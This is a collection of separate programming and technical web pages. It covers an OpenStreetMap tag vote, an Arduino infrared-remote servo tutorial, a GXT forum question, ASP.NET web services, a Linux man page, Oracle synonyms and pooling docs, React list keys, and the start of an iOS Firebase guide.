A hotel which rents bikes:
tourism=hotel service:bicycle:rental=yes
More keys
Proposed features/More service:bicycle keys contains a proposal for more keys (which are not covered by this proposal).
Alternative namespace
As discussed, market: or shop: have been replaced with service:. This gives a clearer picture of what is actually available.
- Out of all the alternatives, I prefer shop:bicycle=*. I'd rather hint at Key:shop than Key:service (or indeed, Key:bicycle) as the "root" of the namespace. --achadwick 12:22, 9 June 2011 (BST)
Please use the talk page
Voting
Voting is open until 2011-05-16. Please vote with {{vote|yes}} or {{vote|no}} and sign with ~~~~
- I approve this proposal. --FedericoCozzi 22:39, 2 May 2011 (BST)
- I oppose this proposal. This tag is useless without the specialisation tags. WTF did you remove them --Extremecarver 23:51, 2 May 2011 (BST) I think a separate proposal is better: Proposed features/More service:bicycle keys --FedericoCozzi 22:35, 3 May 2011 (BST)
- I approve this proposal. although I'm agree with Extremecarver. If the only problem is about yes/no values, the tag scheme could be service:bicycle:retail:bicycle_type=* or service:bicycle:rental:bicycle_type=* (and for rent and sell, just add the two tags). --Dri60 09:30, 3 May 2011 (BST)
- I approve this proposal. I agree with Extremecarver that the specialization tags would also be nice, but I don't think the proposed tags are useless without them. I encourage Extremecarver to copy his suggested tags into a new proposal. --Dieterdreist 10:37, 3 May 2011 (BST)
- I approve this proposal. Agree with Dieterdreist - it is Ok to start with a proposal that is simple and slim, as long as the scheme is open for extensions.--Bk 10:45, 3 May 2011 (BST)
- I approve this proposal. --Burnus 11:28, 3 May 2011 (BST)
- I approve this proposal. --Ueliw0 12:16, 3 May 2011 (BST)
- I approve this proposal. --Polyglot 13:18, 3 May 2011 (BST)
- I approve this proposal. Seems useful, there is a lot of : in the tags though. Johan Jönsson 17:13, 3 May 2011 (BST)
- I approve this proposal. --Flaimo 20:11, 3 May 2011 (BST) maybe the second ":" could be replaced with a different kind of separator. suggestion: "#".
- I approve this proposal. -- Al3xius 18:31, 4 May 2011 (BST) But I hope an appropriate preset will be developed and included in JOSM asap.
- I approve this proposal. --Silviopen 15:38, 7 May 2011 (BST)
- I approve this proposal. --SteveVG 13:08, 9 May 2011 (BST)
- I approve this proposal. --DarkFlash 17:15, 9 May 2011 (BST)
- I approve this proposal. A similar scheme is already in use in some cyclist's club in Italy as a way to classify bike-friendly shops. --Emmexx 08:05, 10 May 2011 (BST)
- I approve this proposal. Kevin Steinhardt 20:12, 10 May 2011 (BST)
- I approve this proposal. EsbenDamgaard 15:46, 12 May 2011 (BST)
- I oppose this proposal. as it stands - the namespace is wrong (in my opinion) - see comments on talk page --Spark 20:15, 13 May 2011 (BST)
- I approve this proposal. --Glen 04:05, 16 May 2011 (BST)
- I oppose this proposal. There is enough information already given for cyclists with existing tags.--R-michael 17:56, 16 May 2011 (BST)
- I oppose this proposal. Ugly, and wrong namespace. Let's use just bicycle:<whatever> on its own. --achadwick 11:07, 9 June 2011 (BST)
Source: http://wiki.openstreetmap.org/wiki/Proposed_features/service:bicycle
Control Anything Remotely With Infrared Signals.
Introduction: Control Anything Remotely With Infrared Signals.
Who would have thought that just about every Arduino attachment can be controlled in some way with a TV remote? Now it's time to find out how.
Step 1: Setup and Materials
The setup for this is quite basic. The real challenge is finding neat products for this and writing the code.
Materials.
1x Arduino
1x Servo available @ Hobbyking Sparkfun etc.
Jumper wires
1x Infrared receiver diode available @ Sparkfun Allelectronics Radioshack etc.
4x AA Battery and holder Ebay is the cheapest for the holder
1x TV remote
Anything that you want to control
See the attached sketchup for the setup. If you do not have sketchup you can download it here.
Step 2: Values
The first thing to do is load the below code on to the arduino and open the serial monitor.
Next press a button on the remote aimed at the receiver to see the value printed. Ignore the first value that you see as it may be off.
#include <IRremote.h>
int RECV_PIN = A0; // Analog Pin 0
IRrecv irrecv(RECV_PIN);
decode_results results;
void setup()
{
Serial.begin(9600);
irrecv.enableIRIn(); // Start the receiver
}
void loop() {
if (irrecv.decode(&results)) {
Serial.println(results.value, HEX);
irrecv.resume(); // Receive the next value
}
}
Step 3: Code
Now that you have the values for each button on your remote you can control the servo. Below is also code that you can do without a servo and instead just control the LED on digital pin 13.
You will need to download the infrared library if you do not have it already.
You may recognize some of this code, and that is to keep everything simple. I am using code widely available on the internet largely from arduino.cc and so that if anyone has questions they can look it up for more reference.
LED code
#include <IRremote.h>
unsigned long someValue = 0xXXXXXXXX; // where XXXXXXXX is one of your remote's values.
int RECV_PIN = 11;
IRrecv irrecv(RECV_PIN);
decode_results results;
int led = 13;
// the setup routine runs once when you press reset:
void setup() {
Serial.begin(9600);
irrecv.enableIRIn(); // Start the receiver
// initialize the digital pin as an output.
pinMode(led, OUTPUT);
}
// the loop routine runs over and over again forever:
void loop() {
if (irrecv.decode(&results)) {
Serial.println(results.value, HEX);
irrecv.resume(); // Receive the next value
}
if(results.value == someValue) {
digitalWrite(led, HIGH); // turn the LED on (HIGH is the voltage level)
delay(1000); // wait for a second
digitalWrite(led, LOW); // turn the LED off by making the voltage LOW
delay(1000); // wait for a second
}
}
Servo code
#include <Servo.h>
#include <IRremote.h>
unsigned long Value1 = 0xXXXXXXXX; // where XXXXXXXX is one of your remote's values
unsigned long Value2 = 0xXXXXXXXX; // a second button's value from your remote

int RECV_PIN = 11;
IRrecv irrecv(RECV_PIN);
decode_results results;
Servo servo1;

void setup() {
  Serial.begin(9600);
  irrecv.enableIRIn(); // Start the receiver
  servo1.attach(9);    // Servo signal wire (pin 9 here; match your own wiring)
}

void loop() {
  if (irrecv.decode(&results)) {
    Serial.println(results.value, HEX);
    irrecv.resume(); // Receive the next value
  }
  if(results.value == Value2) {
    servo1.write(179);
  }
  if(results.value == Value1) {
    servo1.write(1);
  }
}
Step 4: Remotely Control Your Life
Everything should be working now. Load the servo code and watch it twist and turn to the values you loaded on the arduino. At this point you could control an entire robot with a TV remote or control appliances. The world is open to being controlled entirely by you with infrared signals.
Please let me know if you have any more ideas or what you have done with infrared signals. Enjoy!
My CODE wont work, can somebody help... It says
Arduino: 1.6.4 (Windows 8.1), Board: "Arduino Uno"
sketch_nov11a:5: error: 'IRrecv' does not name a type
sketch_nov11a:6: error: 'decode_results' does not name a type
sketch_nov11a.ino: In function 'void setup()':
sketch_nov11a:8: error: redefinition of 'void setup()'
sketch_nov11a:1: error: 'void setup()' previously defined here
sketch_nov11a:11: error: 'irrecv' was not declared in this scope
sketch_nov11a.ino: In function 'void loop()':
sketch_nov11a:15: error: 'irrecv' was not declared in this scope
sketch_nov11a:15: error: 'results' was not declared in this scope
sketch_nov11a.ino: In function 'void loop()':
sketch_nov11a:21: error: redefinition of 'void loop()'
sketch_nov11a:14: error: 'void loop()' previously defined here
'IRrecv' does not name a type
"Show verbose output during compilation"
enabled in File > Preferences.
please somebody
but had a lot of problems with the variable and hexadecimal values
Cool.
Good Tutorial Man! (Y)
I made something alike using an old TV remote to control several LED lights completely. Playing with Remotes and Signals is really AWESOME! \\m//
HELP I UPLOAD THE SKETCH TO GET SERIAL VALUES AND I OPEN SERIAL MONITOR AND PRESS BUTTONS BUT IT DONT WORK!!!!
Hello!
I have a great idea to use this for a school project
For the project we have to make a small wooden truck
i am making a rocket transporter
I had the idea of making the rocket move upand down at an angle
Ill try and add images when im done
Thanks for the guide though!!!
I am trying to control a owi robotic arm via a IR remote. I have got the arm to move but as soon as my remote starts sending the FFFFFFFF repeat signal my sketch doesn't recognise it and the motor stops. What is the best way to interpret this signal into my sketch?
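One common approach (a sketch, assuming an NEC-style remote that sends 0xFFFFFFFF while a button is held): remember the last real code and substitute it whenever the repeat marker arrives.

unsigned long lastCode = 0; // most recent real button code

void handleCode(unsigned long code) {
  if (code == 0xFFFFFFFF) {
    code = lastCode;  // button held down: repeat the previous action
  } else {
    lastCode = code;  // remember the latest real code
  }
  // ... act on `code` here, e.g. keep driving the arm's motor ...
}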
hey, thanks for your tutorial .
But i m facing one major problem i.e.
when i fetch the IR code with help of SM0038 in fluorescent lamp light it fetch wrong code. without light it works correctly .
Please help me .......
I finally figured it out but it is only picking up zeroes no matter what button I push on a multitude of remotes.
It sounds like you are using it as a button. What pin do you have it attached to? Perhaps try of the PWM pins such as 10 or 11. When you downloaded the library and dropped it into the Arduino folder on your computer there should be a file inside called IRremoteInt.h Inside of that is where you change Wprogram.h to Arduino.h
Can you send me a screen shot of your program with any of the error messages? Sorry this is causing you so much trouble.
Dear Hammock
I have small issue with controlling servo with remote and will really appreaciate for your help.
I have implemented IRremote to control hobby king Digital Servo motor.Problem I am facing is that there is lot of Servo jittering. It makes sufficient noise.Did you face this problem? I am trying to maintain position of servo to 90 degree in the loop.(Without Iremote is works fine) Can you please let me know whether do you have any solution to elimiate Servo motor jittering?
Thank you in advance.
I downloaded the library and put it into the Arduino library folder. I copied your code into a sketch and when i tried to upload it i get a < 'IRrecv' does not name a type > error when compiling. I'm not sure what this means ( still pretty new to the Arduino / C++ platform.
I had this exact same problem and spent way too much time trying to fix it. Fortunately there is an easy fix. Open up the Infrared library and change
#include <WProgram.h>
to
#include <Arduino.h>
in IRremoteInt.h.
Please let me know if that doesn't work.
For some reason not all of the text posted. The attached photo shows what you need to change in the Infrared library.
I did this but when i try to save it, I am given a message that says access denied. I am the Admin of my computer so I have no idea why.
You could create a new admin account for all of your arduino projects?
I had this exact same problem and spent way too much time trying to fix it. Fortunately there is an easy fix. Open up the Infrared library and change (see picture).
Please let me know if that doesn't work.
opened the IRremoteInt.h in text edit and changed the code but i am still receiving the same error message when compiling. any other thoughts?
i deleted the library and re-downloaded it and then change the code again and now it seems to be working fine. thanks. this is going to be the main controls on all my robots for a while.
I can not get this program to work no matter how hard i try. I've downloaded the library and no matter what I do, it gives me multiple errors.
Have you gone into the library and changed <WProgram.h> to <Arduino.h>? I know this gave me an hour of frustration before I changed it.
What I was typing disappeared. Anyway if you go into the library at the top you should see WProgram.h in-between greater than, less than signs. If you have not already change that to Arduino.h
Do I find this in the library going through my program files or do I change it in the program itself? I had a little difficulty understanding what you meant.
Do I have to use a ground terminal on the IR reciever? I have two IR recievers and they only have positive and negative.
Can you send me the link to the data sheet? It sounds like each ground will plug into an analog pin and then you will have to use the analogRead() function.
One more question. i have been trying to use this code along with code for the Arduino motor shield. the two codes by their self work fine but when put together the motor shield does not work. could there be any conflicting pins or variables that might be interfering?
There is a list of pins that the motor shield uses at
one of them is A0 it also uses A1 so try A2 and see what happens.
After reading the motor shield page again it might be better to try using pin A4.
Hello. This project is a great ideea, tough it sould de more specific since, i guess, you entered for te arduino challenge. Nvermind, i woud like to ask if you could control more than one servo with this. Thanks.
You can control up to 12 servos on an arduino (6 on PWM and 6 on analog pins using the servo library). So if you had a remote control with 24 buttons then each servo could have two different values it would move it individually. For example if you pressed the power button on the remote then servo 1 could move to 160 degrees. Then you could press the #2 button and that same servo would move to 50 degrees. All the while the rest of the servos would remain unchanged. To do this in the code you will need 24 unsigned longs (1 for each of the 24 buttons on the remote control. Please Let me know if this is not clear or if you have any questions.
I had this idea too, but I wanted to wire it into my light switches should I could just point and turn off the light when watching a movie.
You could definitely do that as long as the path to the infrared receiver is not blocked by any solid objects. Great idea.
Source: http://www.instructables.com/id/Control-anything-remotely-with-Infrared-signals/
Unanswered: Appearance Design Pattern - uh, now what do I do with it?
Ok, so I have some code running based off the Appearance Design Pattern article. The bulk of the code involved as I have it running is on the article's page, and also mentioned a bunch in this thread.
I've changed my Entry Point class, though, to look as follows:
Code:
public class GWT3BetaTest1 implements EntryPoint {
public void onModuleLoad() {
VerticalPanel panel = new VerticalPanel();
panel.add(new Label("Hello there!"));
panel.add(new AppearancePushButton("An AppearancePushButton"));
RootPanel.get().add(panel);
}
}
All well and good.
Now, what do I do with it?
There are a few points to that, I guess:
1) The Sencha article shows as the Appearance interface the following:
Code:
public interface Appearance {
void render(SafeHtmlBuilder sb);
void onUpdateText(XElement parent, String text);
void onUpdateIcon(XElement parent, Image icon);
}
Code:
public abstract static class Appearance {
public void onHover(Context context, Element parent, String value) {}
public void onPush(Context context, Element parent, String value) {}
public void onUnhover(Context context, Element parent, String value) {}
public void onUnpush(Context context, Element parent, String value) {}
public abstract void render(Context context, SafeHtml data, SafeHtmlBuilder sb);
}
What determines what methods and signatures can exist for an Appearance interface? Can I simply add an onHover and an onUnhover for the Appearance interface (and corresponding class that implements it)? How do I know what parameters they should have? etc.
For example, I'd like my "AppearancePushButton" class to have some sort of change in its look when I hover, and want to know how to do this with appearances.
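(A hypothetical sketch of such an extension, modeled on the first snippet above — not a confirmed GXT signature:)

Code:
public interface Appearance {
  void render(SafeHtmlBuilder sb);
  void onUpdateText(XElement parent, String text);
  void onUpdateIcon(XElement parent, Image icon);
  // hypothetical additions:
  void onHover(XElement parent, boolean hover); // e.g. toggle a CSS class on parent
}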
2) How do I use this to be able to swap Appearances? Would each class of my own that I create need its own internal Appearance interface, and potentially multiple DefaultAppearance classes inside? Do I create a stand-alone Appearance interface, multiple implementations of it, and swap in and out which one I use with the "replace-with" directive in the project xml file? Can a single Appearance interface and a single implementation of it cover everything all my classes would need?
3) What about classes that already exist? How do I apply this, to say, the GXT 3.0 Window class? I want the borders, titlebar, and background to have different than the default colors - how do I do this with Appearances?
Thanks in advance... if there's some sort of reference guide that covers this, I'd be more than happy to use that. I apologize if I'm coming off as needing a bit of hand-holding.
Source: http://www.sencha.com/forum/showthread.php?170856-Appearance-Design-Pattern-uh-now-what-do-I-do-with-it&s=566fa02ab46b3e02f5b361ef6e0080ac&p=708318
What are the Web Services and how to create a Web Service in ASP.NET?
by GetCodeSnippet.com • May 25, 2013 • Microsoft .NET Web Services, Microsoft ASP.NET • 1 Comment
What is a Web Service?
A Web Service is a software program that uses XML to exchange information with other software via common internet protocols. A Web Service is a way to interact with other objects over the internet: it is an application designed to interact with other applications. Web services allow servers to expose their functionality, and clients can use this functionality according to their requirements.
In plain words, it is a method of communication between two devices over the internet. A web service is a function that can be accessed by other programs via the internet, so the target of web services is other programs rather than humans. Web Services are protocol, platform and language independent; they are based on XML, so all the communication is in XML.
Web Services Technologies
Web services use the following technologies.
XML (Extensible Markup Language)
It is a markup language that provides standard rules to encode data to carry via internet. It allows users to define their own tags rather than predefined tags.
SOAP (Simple Object Access Protocol)
It is based on XML and it actually the communication protocol. It provides communication mechanism between web services and applications via internet.
WSDL (Web Services Description Language)
It is also based on XML and it is used to describe and locate Web Services.
UDDI (Universal Description, Discovery and Integration)
It is actually the directory for storing information about web services and web services interfaces.
- Open Visual Studio 2010 and Select New Website form File > New
- Now Select Add New Item from Website and select Web Service
- You will see following window on your screen.
- A WebMethod HelloWorld() is already there, but you can write your own web methods, as I have done with the Multiply() web method. This method takes two integer parameters, multiplies them and returns an integer value.
Two important things to note here are the System.Web.Services namespace and the [WebMethod] attribute. You must use the System.Web.Services namespace and specify the [WebMethod] attribute at the top of every method you want to expose as part of the web service. You must also declare these methods "public".
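A minimal sketch of the service described above (the class name comes from the default template; adjust to match your file):

using System.Web.Services;

[WebService(Namespace = "http://tempuri.org/")]
public class Service : WebService
{
    [WebMethod]
    public string HelloWorld()
    {
        return "Hello World";
    }

    [WebMethod]
    public int Multiply(int a, int b)
    {
        // Takes two integer parameters, multiplies them and returns the result
        return a * b;
    }
}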
- Press F5 and you will see following in your browser.
- You can test the web service by clicking on “Multiply”.
- Now provide two values and click on “Invoke”.
- You will see the result like this.
Thanks for sharing detailed information about web services. This is quite helpful.
Source: http://getcodesnippet.com/2013/05/25/what-are-the-web-services-and-how-to-create-a-web-service-in-asp-net/
MAKEDEV(3) Linux Programmer's Manual MAKEDEV(3)
makedev, major, minor - manage a device number
#include <sys/sysmacros.h>

dev_t makedev(unsigned int maj, unsigned int min);
unsigned int major(dev_t dev);
unsigned int minor(dev_t dev);

┌─────────────────────────────┬───────────────┬─────────┐
│ Interface                   │ Attribute     │ Value   │
├─────────────────────────────┼───────────────┼─────────┤
│ makedev(), major(), minor() │ Thread safety │ MT-Safe │
└─────────────────────────────┴───────────────┴─────────┘
The makedev(), major(), and minor() functions are not specified in POSIX.1, but are present on many other systems.
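A short usage sketch (the device path is just an example):

#include <sys/types.h>
#include <sys/sysmacros.h>
#include <sys/stat.h>
#include <stdio.h>

int main(void)
{
    struct stat sb;

    if (stat("/dev/null", &sb) == 0) {
        unsigned int maj = major(sb.st_rdev);  /* split the device number */
        unsigned int min = minor(sb.st_rdev);
        printf("/dev/null is device %u:%u\n", maj, min);

        dev_t dev = makedev(maj, min);         /* recombine into a dev_t */
        printf("recombined major: %u\n", major(dev));
    }
    return 0;
}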
mknod(2), stat(2)
This page is part of release 4.12 of the Linux man-pages project. A description of the project, information about reporting bugs, and the latest version of this page, can be found at https://www.kernel.org/doc/man-pages/.

Linux 2016-03-15 MAKEDEV(3)
Pages that refer to this page: mknod(2), stat(2), udev_device_new_from_syspath(3)
Source: http://man7.org/linux/man-pages/man3/minor.3.html
Sure, I understand that in older versions of Oracle, before the ALTER SESSION SET CURRENT_SCHEMA option was available, synonyms could be used to more easily "repoint" code to different schemas for testing purposes.
ALTER SESSION SET CURRENT_SCHEMA has been around since at least version 8i of the database. 8i was released in 1999, shortly after I started using Oracle, so I've never seen the need for synonyms.
As Tom Kyte has said:
I've been recommending the alter over synonyms for a while.
I don't like synonyms (not even a big fan of the alter -- believe the schema should be qualified in the app but anyway...)
Alter is the lesser of two evils.
This week I finally created a local synonym, and realized why I dislike them... and a few other things.
Here's why I created one:
We've got a "large" datamart where I implemented the code and staging area as a separate schema from the facts and dimensions. That separation is a good thing. But one of the table names I'd created was long, and I was getting annoyed continually retyping it.
Normally, I'd have just created a view... but I realized that if I added columns to the table, I'd need to re-create the view. But I wouldn't if I created a synonym. So I did.
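Something like this, with invented names:

-- Short alias for the long staging table; unlike a view, it needs no
-- re-creation when columns are added to the underlying table.
CREATE SYNONYM fact_sales FOR staging.daily_sales_fact_with_a_long_name;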
Then I asked myself: why haven't I done this before? What's annoying me?
Here's why I hated it:
I realized that I hate synonyms because there's no easy way to list them by functionality.
Here's what I mean. I can easily query a list of tables and views. I look for them because I typically want to write queries using them.
Synonyms are in the same namespace. As the Oracle documentation says:
The following schema objects share one namespace:
Tables
Views
Sequences
Private synonyms
Stand-alone procedures
Stand-alone stored functions
Packages
Materialized views
User-defined types
That's a lot of different functionality in the same namespace.
I don't query procedures or packages. Frankly, I'd like some common list of queryable objects, e.g. tables, views, materialized views, and synonyms that point to tables, views, etc.
Yes, I'd like:
1. a list of USER_QUERYABLE_OBJECTS or some such.
2. namespaces listed in USER_OBJECTS, as grouping of OBJECT_TYPE values.
So that's why I dislike synonyms. If I didn't create the synonym or wasn't told about the synonym, it's not "obvious" (to me) to look for them.
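You have to remember to go look in a separate dictionary view, for example:

-- List private synonyms and what they point at
SELECT synonym_name, table_owner, table_name
  FROM user_synonyms;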
Maybe it's just me, but I'm inclined to agree with Tom Kyte's statement about synonyms quoted earlier.
Source: https://it.toolbox.com/blogs/ganotedp/why-i-hate-synonyms-060912
java.lang.Object
  oracle.jbo.common.ampool.PoolTester
public class PoolTester
The PoolTester class provides a sample implementation and use of Application Module Pooling in LOCAL mode. This example uses the default implementation of Application Module Pooling.
View implementation of PoolTester
Create the pool TestAMPool. Since PoolMgr is a singleton object, use PoolMgr.getInstance to get it. Use createPool to create the pool. Notice that createPool requires the name of the pool, the name of the package that contains the Application Module, the connect string to the database, and env, the hashtable. The createPool method is overloaded; an alternative version takes an additional parameter that lets you override the default implementation of Application Module Pooling and specify your own.
Create a second pool, SecondAMPool that connects with the same environment variables, but to an Application Module in a different package.
PoolMgr.getInstance().getPool("TestAMPool") gets a handle to the pool to work with it.
Checkout three instances. Note that the classes ApplicationPoolImpl and PoolMgr contain other functions that you can use to traverse the pool content. The ampool package also contains a PoolAdministrator Web Bean that you can use to dump the contents of the pool.
Get a handle to the second pool, check out two instances, then check in one.
Use removePool to remove the Application Module Pool. This function calls remove() on all of the Application Module instances, including ones that are currently checked out and in use, and causes them to disconnect from the database and remove all of their View Objects.
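Pieced together from the description above, the flow looks roughly like this — a sketch, with the connection details invented and the checkin call assumed as the counterpart to checkout:

import java.util.Hashtable;
import oracle.jbo.ApplicationModule;
import oracle.jbo.common.ampool.PoolMgr;

public class PoolFlow {
    public static void main(String[] args) {
        Hashtable env = new Hashtable();             // environment for the connection
        PoolMgr mgr = PoolMgr.getInstance();         // PoolMgr is a singleton
        mgr.createPool("TestAMPool", "test.TestModule",
                       "jdbc:oracle:thin:@host:1521:orcl", env);

        ApplicationModule am = mgr.getPool("TestAMPool").checkout();
        // ... work with the Application Module ...
        mgr.getPool("TestAMPool").checkin(am);       // assumed counterpart to checkout

        mgr.removePool("TestAMPool");                // disconnects and removes all instances
    }
}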
The next part of the program defines a class, CustomPool, that ensures that no more than three instances are checked out of the pool at any time. In this case, the definition of the checkout method is overridden to check that no more than three instances are checked out. If more than three are checked out, an exception is thrown.
This custom pool class is then used in a program which attempts to create more than three instances. The try-catch loop is set up to start checking out instances and to catch exceptions. When an attempt is made to create the fourth instance, an exception is thrown.
public PoolTester()
public void doTest() throws java.lang.Exception
java.lang.Exception
public static void main(java.lang.String[] args)
args- arguments to the PoolTester sample implementation.
Source: http://docs.oracle.com/cd/E28280_01/apirefs.1111/e10653/oracle/jbo/common/ampool/PoolTester.html
REACT Lists and Keys
Introduction
React lists and keys are among the most basic concepts. This may be the most troubling step for beginners who are just getting started with the React framework. What's scarier is that you can't avoid using lists because practically every application has repetitive content.
But, in practical terms, react lists and keys are pretty simple. All that is required is for it to be conveyed properly. Lists are an essential element for any application. Lists are used in almost every application in some way or another. You may have a task list similar to a calendar app, a photo list similar to Instagram, a shopping cart list, and so on. There are several applications. Lists in an application might be resource-intensive. Imagine an app with a vast list of videos or photos, and as you scroll, you keep getting hundreds more. This could have a negative impact on the app's performance.
Because performance is crucial, you should ensure that any lists you use are built to be as efficient as possible.
Did you know that when using lists in React, each list item needs its own unique key? Let's learn more about React lists and keys, as well as how to use them correctly.
React Lists
Almost every project I've ever worked on included a list of elements. React also makes it a lot easier to render lists in JSX by supporting the Javascript .map() technique.
In Javascript, the .map() method iterates through the parent array, calling a function on each element. Then it creates a new array containing the values that have been changed. It does not affect the parent array.
React Keys
One more thing is required when establishing a list of elements, and that is a key.
The element's key is a special attribute that must be included on the element, and its value is a string (other values are coerced to strings). The keys within a list should be distinct, which means you shouldn't give two items identical values.
Each item within an array must have a unique key, but the key need not be globally unique. The same key can be used across various unrelated components and lists. To put it differently, keys should be unique among siblings rather than globally.
For example, you should not use status or text as a key because they are not identifiers.
The element's key serves as a form of identifier for React, allowing it to figure out which element was updated, added, or removed.
It's a good idea to pick a value that serves as a unique identifier for each item in the array, which is usually the ID.
Creating a basic List component
Lists are commonly used to display data on websites in an ordered way. Lists can be generated in React in the same way that they are in JavaScript. Let's look at how lists are transformed in regular JavaScript.
The traversal of lists is done with the map() function.
function ListComponent(props) {
  const listItems = props.myList.map((item) =>
    <li>{item}</li>
  );
  return (
    <ul>{listItems}</ul>
  );
}

const myList = ["Lotus", "Rose", "Sunflower", "Marigold", "Lily"];
ReactDOM.render(
  <ListComponent myList={myList} />,
  document.getElementById('root')
);
The code above shows a ListComponent that renders a list of props provided to it. We called the ListComponent in the render() method and handed it a list called myList as props. The following is the outcome of this code:
Lotus
Rose
Sunflower
Marigold
Lily
When you run this code, we'll notice that React issues a warning.
It's important to note that the caution here is about providing a unique key. Let us know how to use keys to increase the performance of your React application.
Use of React keys in React Lists
React uses keys to figure out which elements have changed (added, removed, or re-ordered). A key is necessary to give each element in the array a unique identity.
Let's rewrite the React code sample we saw previously in React lists to incorporate keys to better comprehend this.
function ListComponent(props) {
  const listItems = props.myList.map((item) =>
    <li key={item.id}>
      {item.value}
    </li>
  );
  return (
    <ul>{listItems}</ul>
  );
}

const myList = [
  {id: 'a', value: 'Lotus'},
  {id: 'b', value: 'Rose'},
  {id: 'c', value: 'Sunflower'},
  {id: 'd', value: 'Marigold'},
  {id: 'e', value: 'Lily'}
];
ReactDOM.render(
  <ListComponent myList={myList} />,
  document.getElementById('root')
);
The key in this method is a one-of-a-kind string that identifies each item. Note that we've included a key for each list item in this code snippet above. Also, note that the original React list has been changed to be a value-id pair. A unique id is assigned to each item in the array. As a result, this is the id that is allocated to each object as a key. This is the most effective method for assigning unique keys to items on a list.
Is it better to use the index as a key in your project or not?
There are three conditions you must check, and they must all be met in order for you to utilize index as a key in your list with confidence:
- The list is never sorted or filtered.
- On the list or list items, you never make any changes or computations.
- The list's items have no identifiers(id).
Note: Using an index as a key may cause the component to behave in an unexpected way. The order of items may change, hence utilizing indexes as keys are not recommended. This can have a negative impact on performance and cause component state difficulties. If you don't set an explicit key to a list item, React will use indexes as the default key.
Extracting Components with keys
Consider the following scenario: we've constructed a separate component for list items, and we're extracting list items from it. We'll have to assign keys to the component we are returning from the iterator rather than the list elements in that case. That means, instead of assigning keys to <li>, we should assign them to <Component />. To avoid making a mistake, remember that anything we return from the map() function must be assigned a key.
Keys make sense only in the context of the surrounding array.
For example, if you're extracting a ListItem component, you should preserve the key on the array's <ListItem /> elements rather than the <li> element in the ListItem itself.
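For instance, a minimal sketch of the pattern just described:

function ListItem(props) {
  // No key here — the key belongs where the array is built
  return <li>{props.value}</li>;
}

function List(props) {
  return (
    <ul>
      {props.items.map((item) =>
        <ListItem key={item.id} value={item.value} />
      )}
    </ul>
  );
}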
Great, now that we know a lot about keys, let's look at how we can generate unique keys if you don't already have them in your data.
Generate unique React keys
Let's say the data you're working with doesn't include any unique values, such as ids or other identifiers, and you really need to utilize something other than the index value. If that's the case, there are at least two options.
- Create the key on your own.
A simple piece of JavaScript can generate a random integer or string. You can also use the new Date().getTime() JavaScript method to produce a number, add any prefix, and use the result as your key.
- Make use of a plugin that already exists.
For generating unique keys for React lists, there are a few options. The shortid generate() method used to be popular, but since shortid is deprecated we can use nanoid instead. 'uuid' and 'uniqid' are two others that come highly recommended. They're all straightforward to set up and use.
Nanoid is highly recommended as it is 2 times faster than ‘uuid’, safe, secure, URL-friendly, and is a unique string ID generator for Javascript.
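For example, a sketch assuming the nanoid package is installed — generate the ids when the data is created, not during render, or the keys will change on every render:

import { nanoid } from 'nanoid';

const myList = ['Lotus', 'Rose', 'Sunflower'].map((value) => ({
  id: nanoid(), // unique, URL-friendly string id
  value: value,
}));
// later: myList.map((item) => <li key={item.id}>{item.value}</li>)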
These methods will solve almost all the problems with React lists and keys.
A "key" prop should be assigned to each child in a list
The final point to make in this article concerns the most typical and persistent mistake you'll encounter in the console when developing.
If you encounter the following error ‘Each child in a list should have a unique key prop…’, you already know that the only option is to give each of your list items a unique key.
Even if you've already allocated the key, the issue could indicate that one of the keys isn't unique. To overcome this, you must use one of the above-mentioned ways in “Generate unique React Keys” to ensure that your key value is unique.
Frequently Asked Questions
- What is the use of React Lists?
Lists are generally used to present data menus on websites and are used to display content in an ordered way. Lists can be generated in React in the same way that they are in JavaScript. The traversal of lists is done with the map() function.
2. What do you mean by React Keys?
The React key is a unique identifier. It's used in React to figure out which items in the Lists have changed, been updated, or been removed. It's beneficial when we've added components dynamically or when users change the lists. It also assists in determining which components in a collection need to be re-rendered rather than rendering the complete collection each time.
To provide the elements a stable identity, keys should be given inside the array.
3. Are React keys and props the same thing?
The keys and props are not the same thing; the process of assigning "key" to a component is the same. Keys are internal to React and, unlike props, cannot be accessed from within the component. As a result, we would need to pass the key as another prop.
Key Takeaways
In this blog, we went over the fundamentals of React lists and keys. We also learned how to create a list in React JSX and what keys are, and why they're important to include.
We also learned about the many ways for creating unique ids and why key uniqueness is critical in some instances. Let's review the main points of this article of react lists and keys.
- Lists are resource-intensive and should be utilized with caution.
- Make sure that each and every item in the list has its own key.
- It is preferable not to utilize indexes as a key unless you are certain that the list is static (no additions, reordering, or removals).
- To generate a key, never use insecure keys like Math.random().
- If unstable keys are utilized, React will experience performance degradation and unexpected behavior.
Enroll in our Advance Front-end Web Development Course- React.js to deeply understand the concept of React lists and keys in Web Development.
Happy Developing!
Source: https://www.codingninjas.com/codestudio/library/react-lists-and-keys
A while ago, I published an article on how to build an Android application, and bundle it with Firebase. The purpose of that article, and the one you are reading now, is to slowly introduce the world of mobile app development and Firebase, given the latter is getting more and more traction as Google’s go-to analytics platform.
After finishing work on the Android guide, I immediately started working on its counterpart for iOS, and that’s the one you’re reading now.
The process is essentially the same. We’ll develop the application using Mac’s own integrated development environment (Xcode), and the steps to create and integrate Firebase and Google Tag Manager deviate only very little from Android.
I’ve also created a video you can watch if you prefer.
What you’ll build
We’ll build an iOS application using the Swift programming language. The application will be built with Xcode, so you’ll need to use a Mac computer for this as there’s no native support for Xcode on other platforms.
Next, we’ll create a Firebase project, and connect it to a Google Analytics account. After doing this, your application will automatically collect some events.
We’ll add a simple
select_content event, which will be logged in Google Analytics for Firebase.
Finally, we’ll create a Google Tag Manager container, and have it listen for the
select_content event, and then duplicate its content to a Universal Analytics endpoint.
The application we’ll create will be hideous and feature-bare. Creating a flashy app is not the point here. I want to show you how easy it is to get started, and you can use even this simplest of applications to play around with Firebase in order to learn how it works.
Step 1: Create a project in Xcode
Let’s get started!
Go to the Applications folder of your Mac and launch Xcode.
Click on File -> New -> Project to create a new Xcode project.
Choose the Single View App as the template, and click Next.
In the next screen, give the product a name such as
My Test Application. If you want to run the application on a physical device, choose yourself from the Team drop-down. If the Team dropdown doesn’t show your name (as configured on your Apple ID), follow the options to create a personal team with your Apple ID.
Note! You only have to do this if you want to run the application on your physical device. We’ll be using a simulator in the examples so you can ignore the Team drop-down as well.
You can give a custom Organization Identifier, as that makes it easier to remember your bundle identifier (which you’ll need when creating the Firebase project).
Make sure Swift is selected as the language, and when ready click Next.
Finally, navigate to the directory where you want to create the project in. In my example, it’s a directory named
ios-test.
Click Create when done.
Xcode will now proceed to create your project. Once done, it will open the project’s general settings and show you the project structure in the left.
